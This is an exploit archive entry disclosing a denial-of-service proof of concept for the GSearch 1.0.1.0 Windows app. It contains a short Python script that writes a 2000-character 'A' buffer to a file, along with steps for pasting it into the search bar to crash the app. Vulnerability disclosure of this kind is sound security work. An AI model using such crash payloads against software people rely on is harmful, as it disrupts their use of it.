GSearch 1.0.1.0 - Denial of Service (PoC)

2019-06-24T00:00:00
ID EXPLOITPACK:CF251E80B64A789AE0739A72B9EC5531
Type exploitpack
Reporter 0xB9
Modified 2019-06-24T00:00:00

Description

GSearch 1.0.1.0 - Denial of Service (PoC)

                                        
                                            # Exploit Title: GSearch v1.0.1.0 - Denial of Service (PoC)
# Date: 6/23/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693
# Version: 1.0.1.0
# Tested on: Windows 10

# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# Click any link and app will crash


buffer = "A" * 2000
payload = buffer
try:
    f = open("PoC.txt", "w")
    print("[+] Creating payload..")
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created")